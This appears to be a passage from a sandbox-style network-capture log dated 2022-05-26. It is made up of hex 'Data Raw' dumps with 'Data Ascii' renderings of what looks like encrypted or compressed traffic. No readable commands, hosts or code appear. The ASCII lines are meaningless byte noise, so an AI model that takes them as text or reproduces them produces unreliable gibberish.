                                                                                      2022-05-26 20:56:18 UTC63INData Raw: 3b 8d 44 0a 84 fc 67 73 17 88 d6 a7 66 bd 56 de e9 4d 4d c5 66 26 6e 57 78 b6 55 3d 0b e8 77 8b b9 f8 ee e3 a2 fb e3 69 5b f1 d2 e7 d4 91 7b 89 bc 44 25 53 ae 93 88 54 4d d7 cd 78 67 a1 9e 0c 4d 9f 5f ad a4 74 49 09 84 a9 df 7f c0 61 08 e8 fd 41 c1 5a 9d 18 fb 1a ea fe 5b 4f 53 3b 40 fd 7a 5f 8d 57 33 cb 08 f2 58 ea a0 ab bb 03 77 bb 30 91 17 74 eb 39 96 12 61 03 2f c0 92 6f 02 13 b4 ad 6a c7 46 c0 c7 4b a7 d6 97 bf aa 86 f0 b0 15 09 8f ff 36 d6 c3 5e a7 58 7a 62 df ef 6f 77 e6 61 fe 07 c0 5c 07 d5 e3 6b 70 f1 ce 43 b2 01 e7 f9 97 e9 9d 1c ea 83 6a c8 00 a8 14 ed c6 24 38 40 3b e5 9c 0b bf 47 09 5e 30 f5 54 ec 9a f4 c9 3e b8 93 9e 0a 83 54 3c be 39 cf ab 95 6c 9e b4 c0 46 d0 7c 7c 88 bb 20 40 07 d1 d8 4e 9c 38 e4 7f ec 42 57 e6 e6 7a 7c d7 fd 6d e2 2b a7
                                                                                      Data Ascii: ;DgsfVMMf&nWxU=wi[{D%STMxgM_tIaAZ[OS;@z_W3Xw0t9a/ojFK6^Xzbowa\kpCj$8@;G^0T>T<9lF|| @N8BWz|m+
                                                                                      2022-05-26 20:56:18 UTC64INData Raw: 1b 49 9b 1b f1 43 28 96 1d 1b 07 6e 18 8d 89 4e 61 ee 63 c7 79 d2 d5 96 60 58 45 be 16 30 62 8b 75 2b a7 b3 46 da ae 4b d2 f9 4d 01 e6 e3 2c cf fa a5 c1 90 a9 ed 22 2f fa f5 cf ce 77 c9 81 a0 38 89 8b c9 cc 81 4b dd 3d 92 fc d1 e7 02 5f 5a 81 b9 9b 8e b9 aa 91 bc 5e 75 5c d1 c5 aa cb e4 2c 33 5c 4a d0 c3 5c 36 1a 49 5b 62 24 36 34 81 e6 08 bb d5 de 62 5d 73 9e a7 ca d4 92 3c a0 5c b0 61 7e 12 92 4f 59 8a bc da ef a0 6b 28 1a 06 31 5e a6 ad b3 37 fc 88 46 b3 2e 75 37 77 af 10 b5 59 e9 05 00 66 7c 7f e0 8f fb fc aa 1a f6 8c b5 92 c6 9f fe b9 ef 41 80 25 36 71 dc 2f db 4c 5d 3d 70 89 fc 92 fc 94 ff b3 ce db 52 c6 fb 8b e9 c1 31 df fd 61 5f 14 f4 ae 0f 1c 4f a0 f6 ad 20 a3 33 09 0b 02 09 31 fb 7d 65 1a 82 eb 2a fc 10 13 fe dc 0f ab b5 20 65 5b e5 9b b5 61 b9
                                                                                      Data Ascii: IC(nNacy`XE0bu+FKM,"/w8K=_Z^u\,3\J\6I[b$64b]s<\a~OYk(1^7F.u7wYf|A%6q/L]=pR1a_O 31}e* e[a
                                                                                      2022-05-26 20:56:18 UTC68INData Raw: b2 5d 4a 3c d9 60 5f 7a 7c 27 2d e4 af be 0e a5 73 47 3e 6c bd 35 f4 cf 96 30 bc e1 3b c6 15 1d 78 37 d8 71 80 2d ca 47 72 14 7d 0a c6 fd 81 92 8d 7c 07 f3 e7 f0 e3 98 79 cb 22 24 bb 4b 95 27 14 4a 92 0c d8 44 be fb dc f6 af e9 37 c6 f5 b5 26 a7 1c ee d3 a5 63 ae 26 15 79 61 b4 e4 c5 6b 47 c4 da b5 d1 c2 0d 5d 0e 79 d7 43 db 0e 9c 74 fc 98 1b 89 f9 49 99 b3 34 ac f1 50 95 5b ff e5 c6 20 77 84 b0 6a e7 b5 d3 b0 9a 3f e2 36 3c 3f fe ff 87 6c f8 d6 df 67 9e 59 3c 73 52 48 68 02 40 1f 8c c0 da 88 68 5d 9f ee 5d 38 c5 2e bf 71 d8 f4 91 a9 3b 70 74 71 b7 fe d6 d7 37 f4 85 be 18 79 69 91 09 2e de dd 19 29 8b 02 eb c4 95 f8 82 06 ec 34 f0 cd 1d 44 e4 ce 79 59 26 dd 8d 38 7b 11 e8 7f 1e c7 f7 70 ba b2 b5 99 83 54 c0 2a 5b 83 a3 dc d4 05 10 ed 3f 02 1c 8a 89 ca dd
                                                                                      Data Ascii: ]J<`_z|'-sG>l50;x7q-Gr}|y"$K'JD7&c&yakG]yCtI4P[ wj?6<?lgY<sRHh@h]]8.q;ptq7yi.)4DyY&8{pT*[?
                                                                                      2022-05-26 20:56:18 UTC72INData Raw: 8f 1f f5 db df 31 44 dc d6 0d f7 a0 c4 ae a6 76 9b 3b 42 3c e5 f5 9a 64 ae 80 8c 54 81 6c 50 42 52 51 5f 45 4c 3f 8c df ee 9c 4a 53 c3 f4 67 5a e4 65 8e 77 ec f6 a9 f9 40 27 49 21 94 c6 f4 85 45 be cc a7 43 49 75 b1 0d 1d d4 d3 11 1c 96 51 d7 c1 ac e4 84 3d df 0b e5 90 36 4e de da 60 0f 40 f4 ce 09 70 4a be 42 27 ef c9 28 88 af 96 a4 d1 11 9e 69 32 83 fc fd c7 24 4e f9 6e 2f 31 8d 88 c1 a9 c9 04 cd d0 31 46 ec 1c 7c bf f6 21 01 cb 0b 1a c6 2f 93 88 7d 93 15 9f 45 7a a3 9d 8e e7 45 22 7c ae 85 19 0b 16 82 be be fa 7a b9 88 da 88 e1 27 a7 6a 6e 32 7a a6 04 e2 68 93 53 d3 1b 9a 3b f7 af 5f 6b db f4 96 1c 47 ae 5b 05 ae 66 36 f2 be 5f 04 28 53 77 3d f0 c7 f1 27 3c 9c 39 7d f9 d0 14 28 84 03 d6 85 0e 8d 8e ab 52 b7 cb 2c f1 71 71 6c 6e 0d cc fb e6 7b a2 d5 e5
                                                                                      Data Ascii: 1Dv;B<dTlPBRQ_EL?JSgZew@'I!ECIuQ=6N`@pJB'(i2$Nn/11F|!/}EzE"|z'jn2zhS;_kG[f6_(Sw='<9}(R,qqln{
                                                                                      2022-05-26 20:56:18 UTC76INData Raw: 3d 17 10 b6 8b cf bc fe 01 98 fb 65 5b da 4b 78 f1 86 4d 21 8f 55 2a bc 43 b2 93 76 88 55 96 52 21 a1 8b 83 da 1f 39 51 88 ba 4b 2d 08 b6 ac 9d 80 1d cd d2 a3 8a f8 19 9e 50 77 2c 79 f9 04 ec 0d f7 16 d3 2c 99 3d ee 8d 37 75 b9 fe ef 6b 57 c9 19 27 bc 4c 3e 80 ae 43 35 27 29 43 66 a6 fc f5 5f 06 97 61 4c ec d6 47 16 94 2c c3 da 78 a4 a1 97 3f a7 88 16 f1 78 26 16 4b 3b d8 b4 d1 37 e7 e6 fe 70 71 29 6f fe f3 9f 36 a6 fd 94 37 0f 89 fb e5 04 51 a9 00 88 8a f0 4c 3d 1a 8a 52 47 60 8a 22 42 22 6b d5 0e 32 38 05 94 d6 9e 2a 70 b9 63 0e db a6 5d 0d a2 f7 c7 c0 2c b9 0e 71 4e 9f 6c 2e da b1 7c 2b 12 f5 53 88 85 66 3d 5b 66 f4 c3 21 28 b8 40 fc 5b b9 4a aa 9b d7 74 a0 37 40 0c dc a5 2e dd c4 ee 99 0c 38 29 5e bf 7d 46 67 d7 ef a4 72 3e fe 8c 41 dc 4e 79 99 ef 61
                                                                                      Data Ascii: =e[KxM!U*CvUR!9QK-Pw,y,=7ukW'L>C5')Cf_aLG,x?x&K;7pq)o67QL=RG`"B"k28*pc],qNl.|+Sf=[f!(@[Jt7@.8)^}Fgr>ANya
                                                                                      2022-05-26 20:56:18 UTC80INData Raw: ca b1 e8 5c 8f f2 ce 45 04 36 6b 84 e4 83 3a a7 f7 ac 34 2d f2 a6 a1 08 7e b8 7e de e2 87 2d 69 6c b5 27 36 05 9a 31 32 2f 54 fe 1d 05 30 51 9c 8e ab 20 76 b4 79 22 bf d4 24 66 de 93 84 f5 7c b7 2c 62 4b ce 42 14 ba e7 47 2f 10 c9 70 e1 d9 52 06 5c 54 ff 9a 74 3f c0 40 ec 5f e6 6a b4 94 f3 6a bb 39 18 5f 9d d5 74 ee ce db e3 0c 4f 36 02 db 4e 5d 0d ec b5 8b 53 09 d7 a3 09 87 58 0b a7 a2 60 0b f2 1b ad ac 6e 61 2d 43 ed 6b 95 b6 05 e7 c2 28 06 2c 36 ba e4 0e c8 29 5b cf 64 ac 47 e9 41 f9 5d b9 86 b1 8c 1f 28 0c 11 2f 48 1e 71 6d 14 0e fa a2 12 0c 25 80 d5 6b 2d 8e 50 a4 e9 d7 b9 bb 57 90 86 3c 8a 70 5b 25 5d 4b 92 4f 18 79 65 7e 4c c2 bb e5 8d f8 38 ae 8b 62 52 40 a4 73 28 a6 9b 03 cd cd c2 c3 3b 70 8e 35 cf 5a e3 33 60 1a d3 fe 5d e4 73 dc de 93 2e 65 98
                                                                                      Data Ascii: \E6k:4-~~-il'612/T0Q vy"$f|,bKBG/pR\Tt?@_jj9_tO6N]SX`na-Ck(,6)[dGA](/Hqm%k-PW<p[%]KOye~L8bR@s(;p5Z3`]s.e
                                                                                      2022-05-26 20:56:18 UTC84INData Raw: 1e dd 4b 7d 9b 98 4c 40 eb 7a dc d9 5e 50 5e 36 9f 6b cb cb 03 d9 f8 03 1c 69 41 87 e2 53 bb 30 4c ce 47 a9 28 aa 31 b7 5b 94 ac e6 96 04 63 48 1d 26 66 79 71 56 74 1e c3 e8 5a 0c 0a 97 e8 60 79 90 21 e0 e3 c4 9a ac 73 aa 8b 1a ca 7a 0e 37 59 2d 86 69 69 37 09 37 44 a6 a5 c9 b1 d1 18 a8 ed 62 61 20 e8 27 2f c7 8e 22 e2 c4 a9 fb 19 3b e9 05 ec 44 af 13 26 3c a6 f4 4a ab 49 db dc 8e 3e 78 bb 11 e3 48 5a a0 eb 5e 56 54 33 df 14 fb 3c 80 4b af c8 3a f6 41 ee d2 99 a2 f2 f8 0a 85 b4 a2 81 d3 97 d8 88 cd d9 6a 12 38 2a 7f 73 b7 67 58 fc 68 14 f9 3e ce f8 64 cc 49 e3 06 2d ec 0f b2 cc c5 16 a0 be d2 df 72 2f c9 69 e1 28 30 c7 54 4e 36 1e 11 f5 e5 73 33 ca 3e b4 05 a4 ff a1 aa 6d 15 88 26 0e a7 f8 39 68 de ff d2 ee cf 29 f6 99 d0 3e fd c0 43 b9 2f c5 86 df a2 83
                                                                                      Data Ascii: K}L@z^P^6kiAS0LG(1[cH&fyqVtZ`y!sz7Y-ii77Dba '/";D&<JI>xHZ^VT3<K:Aj8*sgXh>dI-r/i(0TN6s3>m&9h)>C/
                                                                                      2022-05-26 20:56:18 UTC88INData Raw: 70 c6 98 d0 49 59 9f 17 e1 43 67 82 cb 6f 50 03 66 a6 5d af 26 8b 30 c3 9a 4a fd 76 8b b5 c4 8c 8f f0 00 c5 9c a5 98 c6 c8 f6 b5 aa 96 5c 46 36 0d 4f 1c e9 55 1e 8e 50 25 e8 29 f5 e3 21 bd 64 96 28 76 f7 2a 9b cd f5 3f c0 bd a0 ce 5f 76 b5 1a 9b 79 19 d1 69 56 71 0d 39 df d6 77 59 d0 4f f4 33 9d c6 c4 d2 18 67 89 2d 40 8f b9 10 71 a1 fe 83 e9 8e 07 df bc de 44 9c 9a 29 99 1c c8 ef 91 c3 d7 93 4c b9 9e c3 82 fd a6 fe e4 5d cc 2f 8c ee b8 50 ea 8a e3 81 99 ef 38 82 58 b9 84 b8 ff c3 98 f1 ea 56 42 3a 82 97 cc f1 d2 62 4a 06 02 c8 90 d9 64 55 22 60 00 57 56 6d b1 fe 40 c9 83 ac 5a 4a 37 a5 cc 59 90 96 6e 1e 59 88 5d 6d 5a 26 13 14 da 8c e5 0d cf 56 51 14 76 ea 6a c5 e4 99 7a 95 e0 22 8f 5a 72 37 4c c5 29 8b 28 9e 6e 48 55 29 1c ed bf ae bc 8b 29 18 e8 e9 fd
                                                                                      Data Ascii: pIYCgoPf]&0Jv\F6OUP%)!d(v*?_vyiVq9wYO3g-@qD)L]/P8XVB:bJdU"`WVm@ZJ7YnY]mZ&VQvjz"Zr7L)(nHU))
                                                                                      2022-05-26 20:56:18 UTC92INData Raw: be 2b d3 bc c2 c4 ce db 6e a8 b9 e4 9f f2 f6 9a 83 57 ff 31 85 b8 cb 4d 9b ee f9 bb 88 d8 4e c7 60 cb cd 8b e4 d2 ed da fd 2a 4f 5f f1 eb da f7 ac 3b 65 22 3c d3 f0 cd 70 54 01 45 29 4f 60 49 b0 c5 77 a7 9d b9 2b 70 4f af e0 14 86 ae 69 79 37 e5 22 59 58 7d 3a 31 c0 99 e0 6b 86 0d 59 77 6b 9d 2f ea fd 9e 03 96 ea 10 eb 55 1b 26 0b 8c 6a ae 31 a4 64 26 5a 1e 5b 9e f8 89 aa 86 79 1f e1 cf df b8 db 69 c4 75 04 af 6f ae 14 32 48 a4 1a 80 17 db aa 88 e4 88 e7 25 fb d0 b7 63 b5 2e e6 ef f3 6b b3 65 15 42 50 cd f0 96 4d 3b 9a b6 96 be d2 22 74 25 78 fb 01 d3 22 a0 65 ab b9 0a c9 cf 73 8f b9 7e 9b da 72 fb 66 ac bf 88 25 62 b8 f7 6a e7 8e c7 81 90 7d ea 5f 31 15 b3 b6 85 47 fd c7 f3 4e 8f 5a 4a 68 42 6b 7d 54 60 00 ad d6 fb a5 2a 47 c0 cb 6f 5e e6 7c c9 3b 81 e0
                                                                                      Data Ascii: +nW1MN`*O_;e"<pTE)O`Iw+pOiy7"YX}:1kYwk/U&j1d&Z[yiuo2H%c.keBPM;"t%x"es~rf%bj}_1GNZJhBk}T`*Go^|;
                                                                                      2022-05-26 20:56:18 UTC96INData Raw: 28 86 42 e1 72 66 fe de 63 50 38 7c a9 58 81 0f d9 38 9a f0 06 f0 6c d8 bc c4 ee f5 b8 0e d9 a4 94 95 ea 95 c2 a9 82 d6 32 07 4d 1a 6d 44 9b 62 7c f9 64 0f f6 25 e8 c7 22 96 56 bf 37 6e f4 1b b8 ee bc 43 b9 bf c2 cc 7b 28 e3 4b 88 21 02 ee 6a 50 0f 0e 1d d7 ca 11 70 b9 49 90 13 99 fe fd d7 00 2b 89 15 51 8a de 31 1d 8b f9 ab e8 8e 1d cb 8b 9e 4e a4 a1 46 84 0b e2 b4 db ba bb b4 4e bd b2 ce 8b da 94 9a 83 57 ff 25 bd 98 ca 32 9f ea b4 b7 99 c7 62 ec 09 db cd 81 fd e3 9f f8 98 78 1c 6d bb 97 dc c4 af 4e 59 09 3e eb 91 cd 16 65 0e 64 3b 77 72 53 d6 e6 3d b4 99 fa 19 72 01 a9 eb 06 84 ad 57 6c 60 e0 44 1c 36 2c 3b 7a c6 94 f9 04 97 01 49 27 50 aa 2c 85 dd af 47 b9 be 62 c7 01 03 72 1a 8c 7a 8d 14 b8 70 6b 29 7d 5c ef b0 ad cf 9a 42 1e e0 f7 d2 ab aa 79 ff 36
                                                                                      Data Ascii: (BrfcP8|X8l2MmDb|d%"V7nC{(K!jPpI+Q1NFNW%2bxmNY>ed;wrS=rWl`D6,;zI'P,Gbrzpk)}\By6
                                                                                      2022-05-26 20:56:18 UTC100INData Raw: d0 a3 95 49 8b 8f be 9d e0 bc a7 9d 6a ad 75 ba b0 d4 45 b0 e5 b4 82 93 c1 6f da 7c ef 88 9b da f3 9f ed de 4e 33 62 ef d6 88 bf 92 42 07 79 28 c8 a8 ae 71 70 7e 49 1a 6e 79 5d d3 9b 6d 9a 83 f3 14 01 46 dd 81 5c a5 81 03 53 20 d8 30 77 22 25 38 13 bf a9 85 5b d6 05 6b 38 4e 98 0a 88 91 fa 13 c2 ff 05 82 52 31 46 1c d6 64 d5 2e 80 64 2a 57 7b 2a f6 bc d8 8a 96 2c 03 f2 82 fe e9 ec 5b eb 22 65 b9 61 98 5f 24 6a f0 2e d5 7a e3 b4 b5 b6 c1 fd 13 d9 d4 a8 25 ed 1f d2 c2 b0 44 b2 33 54 7d 72 c4 d3 e5 66 6b f7 fc f4 ef 96 5e 5b 2f 4f c0 06 80 49 b5 63 ef a6 11 b8 d7 5d b8 e1 46 8f 88 64 f6 3d 9d a9 85 3f 4b 9a d7 41 b2 a5 95 b0 92 19 a8 60 0e 7c ff de ce 3e 9f 87 83 66 cf 54 75 02 40 7d 69 39 7f 26 a8 f8 d6 d5 2e 46 ac e3 70 3e 87 74 aa 52 85 f7 b0 d0 3c 52 6b
                                                                                      Data Ascii: IjuEo|N3bBy(qp~Iny]mF\S 0w"%8[k8NR1Fd.d*W{*,["ea_$j.z%D3T}rfk^[/OIc]Fd=?KA`|>fTu@}i9&.Fp>tR<Rk
                                                                                      2022-05-26 20:56:18 UTC104INData Raw: ee ea fe cc 08 dd 13 00 be 1f cb 66 54 12 e3 22 d6 65 8a de f7 ed 8a fe 31 e6 cc 95 39 95 35 bf cf f2 55 a8 17 5c 2b 13 97 8b d5 29 6e e2 e0 8c fa e1 3f 78 0c 76 eb 63 8b 4e a3 76 d4 d2 37 b9 e3 43 a6 e8 27 c5 d4 6f b4 36 e6 ee e4 27 7a 8b ff 0b e9 a6 e2 9b ce 4b b8 25 0e 25 f2 e9 bf 69 ec d7 eb 7a 9d 6e 63 5a 4f 53 5e 27 76 37 94 97 ee b8 5e 53 9f e9 56 3e d3 16 90 3c c8 d9 8b d9 41 59 54 29 9f f1 8c b8 66 a0 80 a7 1b 09 13 bb 4b 2f e9 9a 11 1f cb 2f f2 f2 9e e0 a1 27 ae 41 fa a9 3b 44 dc ea 78 74 47 ff cf 2f 5a 43 e6 0b 48 9a b7 75 b9 bc fa 99 f2 0f d2 2a 00 8b ff d7 c6 36 15 ea 1f 16 2e ce da 8a b4 ae 04 df 87 54 05 90 1c 41 9c e8 6d 22 d9 03 75 f7 14 f4 b6 38 a3 00 90 78 24 fd 9a 9c dd 11 3f 60 b6 e9 42 6c 78 d4 8a af e8 44 9a ae f5 99 c4 18 ac 47 3b
                                                                                      Data Ascii: fT"e195U\+)n?xvcNv7C'o6'zK%%izncZOS^'v7^SV><AYT)fK//'A;DxtG/ZCHu*6.TAm"u8x$?`BlxDG;
                                                                                      2022-05-26 20:56:18 UTC108INData Raw: f9 e9 8a da 07 62 07 4b 93 f3 d5 f9 29 f1 b3 af 01 1c 53 d2 2c 25 c7 dd 13 3c 95 0f c7 ce 87 f2 83 6b af 16 d9 88 3f 44 f8 be 4a 53 01 fe 90 22 76 17 ff 7f 0d dc e9 19 99 b2 b3 df b8 5e c6 6b 63 fd fe ec f7 1e 15 fe 14 21 08 9b bb d0 a9 f7 58 8e c7 47 1a d9 44 2f cc bc 73 1e b2 2d 44 ee 0b a6 b3 69 c4 30 a0 6c 75 8d bd be 82 4f 4e 57 82 b5 1b 2e 22 9d 9e af bd 67 a8 85 db 83 c8 3e ba 47 6a 1a 6d df 00 ac 0d dd 0c ce 36 c0 3f f9 ad 76 38 b2 a6 a0 04 74 9b 18 13 9b 70 1c d2 94 43 17 6c 6e 30 7b b9 f5 d5 18 39 ab 38 55 c1 f7 42 34 8c 1a 93 d0 45 c9 9d 92 27 ea c5 3f 89 69 6c 35 40 74 d2 ec a5 56 a3 e3 ca 51 43 08 38 bd ef a2 34 d1 c2 a2 36 1e 81 ab a8 5b 58 82 54 8e c3 a8 08 7b 44 89 5e 65 4c 84 05 66 39 51 d8 32 32 01 52 df d0 b9 20 7a b1 5a 01 e6 f4 03 66
                                                                                      Data Ascii: bK)S,%<k?DJS"v^kc!XGD/s-Di0luONW."g>Gjm6?v8tpCln0{98UB4E'?il5@tVQC846[XT{D^eLf9Q22R zZf
                                                                                      2022-05-26 20:56:18 UTC112INData Raw: ea 93 c2 39 f1 32 03 20 04 9a 27 a6 18 d5 7c 9e 28 a5 12 f3 af 6e 4c 8d a7 f2 06 11 80 00 23 ba 3f 40 b2 f8 0e 00 22 59 40 2e f8 8f c1 46 2c fc 6d 22 98 b7 55 6b 8b 42 de 83 55 ff e4 c4 51 ab 89 3c ac 2f 7f 67 00 4d f4 89 d1 0a db 97 ae 22 17 79 4b 9e c2 8a 12 9f de a9 07 39 a9 ab a1 2f 72 9f 5f bb df bf 23 69 54 fa 2f 14 38 e3 77 66 6d 23 b9 50 40 67 3a 9c 93 cd 67 26 fe 06 43 8a 9e 67 0f 9c cf b4 81 3f d1 70 a4 ad fe 0e 64 93 90 28 48 58 ba 34 cb 6d fd 5b 07 03 d9 ff 33 8b 35 37 bc 26 c4 31 ff d6 80 35 e8 7e 76 74 89 f0 5c 8d b9 b8 b8 21 7b 59 62 90 fd a1 5f a1 80 d7 a6 d4 8b e0 79 fb 1d 4c ff d6 39 69 d2 7d fe f6 37 1c 6e 74 cd 08 aa eb 70 b0 9a 41 6a 5d 63 d0 89 6f 88 7b 08 bb 20 95 15 b4 12 8f 2d fd d9 5f e9 60 22 2e 3e df 0e 57 3e 11 4e 5a 86 94 b4
                                                                                      Data Ascii: 92 '|(nL#?@"Y@.F,m"UkBUQ</gM"yK9/r_#iT/8wfm#P@g:g&Cg?pd(HX4m[357&15~vt\!{Yb_yL9i}7ntpAj]co{ -_`".>W>NZ
                                                                                      2022-05-26 20:56:18 UTC116INData Raw: d0 36 43 8a 9b 60 0d 81 ca b6 84 1f d1 65 25 08 fa 2e 64 8f 95 25 5d 4a aa 2d d9 ed b9 5c 12 11 c9 fe 21 0b 85 35 a9 34 d4 30 ed de 86 21 fa 6e 77 56 9d f6 c9 9f a9 b9 aa 39 7e 5e 63 86 7d 65 5a a6 81 c4 26 64 8f e7 78 a1 14 48 f8 8f 0b 7f d6 42 a2 e5 2f fc 6d 75 de 08 ac fe 62 b0 9b 52 6a 84 6d ca b3 11 64 23 79 68 70 4d bf 4b 1a a4 cc dc 96 df f9 55 1e 21 be ff 0f ac 64 f4 75 df 6c 1d ff 05 55 c4 a1 3b 11 14 d5 99 6b 30 82 47 b6 bf c3 9b 4b 20 5b 05 b6 44 57 de a7 90 01 98 55 dd b1 ea d4 b3 4e 20 17 11 ad 16 39 cd e5 21 55 cd 69 75 86 97 90 96 df af 0c 5f 26 39 94 96 57 96 24 c5 8f 0e 2a c4 d6 fa 62 06 d0 9d 2c e5 08 db b6 89 a7 b1 83 48 54 3f bf 88 5f 12 8f 0e d3 ec 0a 57 e6 58 b7 0e 22 d6 0b 30 a2 a9 6d 90 44 d4 62 ba e5 23 6e a3 50 99 b3 04 2e d9 46
                                                                                      Data Ascii: 6C`e%.d%]J-\!540!nwV9~^c}eZ&dxHB/mubRjmd#yhpMKU!dulU;k0GK [DWUN 9!Uiu_&9W$*b,HT?_WX"0mDb#nP.F
                                                                                      2022-05-26 20:56:18 UTC120INData Raw: f8 55 9c a3 34 66 86 9d be 6b 43 87 06 fe b4 a7 9a 19 63 34 f6 cc 6a d1 24 2b fa 47 09 7f d4 8f 5e 5b 4a ce 36 a0 81 f1 4a 3c 87 bf 5b 02 31 7e db 39 dd 65 01 ab ff 7d 77 19 a6 b1 a5 17 53 09 af ed 5d f5 97 dd 19 e5 81 f3 30 70 cc 46 ea 1e ba 72 ac 5f 0a 63 bf fc f5 f0 97 2d 12 92 06 34 2e a8 8e 35 57 07 a4 31 17 58 c8 8a cd 5b 0d 89 37 41 fd 7c c6 5e 1c 6c 1f 11 65 0d 6d 93 ae 8a 19 9a a2 d7 2b 20 0f ad 62 fa 93 c0 a8 75 69 ce 51 cb a5 b2 b5 87 63 d4 b7 fa 9b 2f 14 0e 67 3a 4a 1b 76 bb 0a 85 65 d5 aa c0 50 60 4b 4f 3f c2 b9 70 9c e0 45 78 e4 f7 75 07 c1 b8 08 79 06 d3 da 9b d8 99 d8 99 e3 95 08 46 44 23 6a 83 03 86 3a 0d f4 0a f1 b1 52 71 97 d0 88 1f 28 b5 54 1c 9f e7 e0 b7 6b 5e e3 e0 e9 6d 21 72 a4 ee 51 6d c1 17 09 04 4b d3 07 f9 98 ac 10 0b 8a c8 c3
                                                                                      Data Ascii: U4fkCc4j$+G^[J6J<[1~9e}wS]0pFr_c-4.5W1X[7A|^lem+ buiQc/g:JveP`KO?pExuyFD#j:Rq(Tk^m!rQmK
                                                                                      2022-05-26 20:56:18 UTC124INData Raw: ee e8 c0 22 f0 37 d8 e1 33 98 3e 62 3d 09 ec 5c f5 19 d3 49 d9 b8 3c e1 f6 0a 94 9f c6 03 82 38 9e 94 b0 18 4f f5 ac b5 d5 a0 dc ab 80 a6 9e 21 1a fc 20 62 22 e4 e0 e3 2a c8 b2 0e 9d 50 0a fd e3 59 70 5a 4b d2 69 f3 59 91 c4 d4 d2 fb e0 e9 56 74 51 c0 c3 0a 84 3e aa bb 59 fe db 5e bd 10 05 3f 45 2e 1c 09 fb 67 46 27 a9 ce 9b fa 18 76 c9 bb 4d f4 83 67 ce 82 80 e2 97 36 99 ec bd 25 f3 b8 4c 46 55 ec b4 81 87 d0 0c 31 5d e7 9f 18 7b e3 c2 f2 b8 91 27 7d e5 47 e8 d1 57 a5 e8 46 52 c6 9e ad 4a 87 64 2d 93 60 66 4c 78 d7 94 49 57 0a c4 eb 90 ad 6a 6d 01 5c 54 1e 57 76 f2 c1 32 2b 89 f6 6a d2 01 4f c8 a5 cc a5 84 8f 30 a3 3c d8 3f c7 4f 7b cc e4 33 43 e4 9f e1 77 48 6d f6 34 02 84 ce b6 2d 2c a9 df 03 6e 8d 8e f2 97 2a b2 11 38 03 03 55 7e 70 66 f8 95 ce 4a 36
                                                                                      Data Ascii: "73>b=\I<8O! b"*PYpZKiYVtQ>Y^?E.gF'vMg6%LFU1]{'}GWFRJd-`fLxIWjm\TWv2+jO0<?O{3CwHm4-,n*8U~pfJ6
                                                                                      2022-05-26 20:56:18 UTC128INData Raw: ed 3c 47 63 a8 e0 a6 1d 3a 4d 5b ff 70 2d ef b9 a7 9e 30 ff 5b ce 2e 90 6c b8 26 5b 0d ce 64 f6 81 00 22 4e 75 17 76 8e 26 7f 96 6d ed 09 2d e7 31 a0 21 c3 15 b0 cf a9 1a e7 04 74 94 07 84 3f 4e 99 1a 66 ef e8 d7 76 29 d8 ad 34 6e 58 17 f3 66 65 40 2f 3f cd d9 b2 36 9c cd 04 1b 2c b6 26 53 07 9b ba e6 b9 53 b0 3b 00 f4 8e 95 23 47 97 25 b0 b4 ce 1b e7 6b bd f4 5c e3 51 a0 aa fd 0a 6f 24 50 23 c0 c4 1f f6 4a 44 b9 23 33 7c a3 6e 7f b9 ea 0c d8 13 89 ff 38 8a 25 64 57 7f 76 28 d3 76 5a b7 a7 40 70 cc d2 6e 53 10 e8 66 a8 aa 9a 07 85 fc 74 7d 42 8c 01 10 89 d5 69 ea 2c 92 a3 4d 3e da 31 33 02 f0 51 a9 46 75 d7 12 bc c3 88 73 53 87 a4 14 06 2b ef 5f 01 51 a5 44 9b cb 3e 33 5f 26 17 07 ee f3 b7 5e 3d 9e 4d 32 b3 61 59 53 17 a1 57 ab c2 0c 12 e3 ff 1d 3d 8a 4a
                                                                                      Data Ascii: <Gc:M[p-0[.l&[d"Nuv&m-1!t?Nfv)4nXfe@/?6,&SS;#G%k\Qo$P#JD#3|n8%dWv(vZ@pnSft}Bi,M>13QFusS+_QD>3_&^=M2aYSW=J
                                                                                      2022-05-26 20:56:18 UTC132INData Raw: 53 3d 4e 8d 80 a2 be 2d ac a0 0d 76 e5 20 f1 60 36 2e 17 78 40 3a 46 f1 2e 82 63 86 d9 1b 7b e0 27 9b 99 7c 2c 51 f0 e4 55 bb b1 50 8c ba 3f 46 9a 5d 9e 4d 0c 5f 5c 89 57 bd 7c ca ea 1c 2d 2e 20 d9 11 27 ac c0 02 a8 77 38 0b ad 1a 42 76 4c 5d 15 26 ca 28 1a b8 2f b2 e5 6e 1e 4e 2a d1 3a 75 46 e2 81 8c 4f 1c ae 5c 09 86 26 83 dc 42 a4 be c2 70 25 1e 06 77 95 c3 ce 04 25 30 c5 d7 5a cb b7 e8 91 2f d4 a4 c5 a0 4b 47 c9 1a f6 7d 10 26 51 54 f9 74 0a 29 33 79 ee ec a6 24 01 99 91 0a 9d 79 92 52 4d a6 cb fe 51 0b 67 61 85 a1 52 0f 21 11 66 83 12 53 27 10 77 f8 f8 ae dc dd 6f 0f 31 be 0f b8 04 89 23 f5 1f 34 cd b5 7b 29 1d e3 a9 f0 fd ff 23 ac e0 29 f3 90 51 b5 3b de cd ac f7 65 bf 2e 60 28 54 1b 3c dc 58 52 bb 40 92 0e 19 c2 d8 03 03 9f 14 cb dc 0d ce ab 14 14
                                                                                      Data Ascii: S=N-v `6.x@:F.c{'|,QUP?F]M_\W|-. 'w8BvL]&(/nN*:uFO\&Bp%w%0Z/KG}&QTt)3y$yRMQgaR!fS'wo1#4{)#)Q;e.`(T<XR@
                                                                                      2022-05-26 20:56:18 UTC136INData Raw: 91 24 8d 2f 0f 61 63 de ed 39 aa d6 b2 15 6f c7 14 29 57 83 93 6d 49 d6 0e 60 cf fa e5 ca 21 88 30 4e 02 5e 50 08 f9 e7 05 df d8 ea 59 a1 fa aa e7 ee 41 5e 4c ac 82 14 69 03 94 38 eb e2 c2 96 a6 22 53 fd 14 c1 0c e2 4a 4d 18 a3 3f f2 82 91 66 92 dc 25 cc 83 69 35 96 e1 71 b0 03 e3 cc 44 5b e4 52 4c 49 6b c3 61 cc 23 80 d2 a0 38 ed 60 36 72 9c eb 80 1a ca 22 b6 f2 ec 31 7a 81 31 e3 a0 36 26 27 b2 08 54 62 cb 1d 24 dc 0f fc f6 19 50 b7 c2 af 4d 47 fd 3b b1 27 23 88 8c 96 e2 81 65 aa 15 43 2c c8 a2 f5 89 8c 8f 1b 1b db 94 ce 6c ec 73 c4 72 2b 40 de 11 99 a7 f7 75 5a cc 7e a4 98 ac 60 ba 66 c7 24 6d 2b e7 56 a8 76 cf 61 eb 33 a9 fe a5 a2 09 01 ff 91 ee bc 76 d2 5e a5 24 1e 11 2e 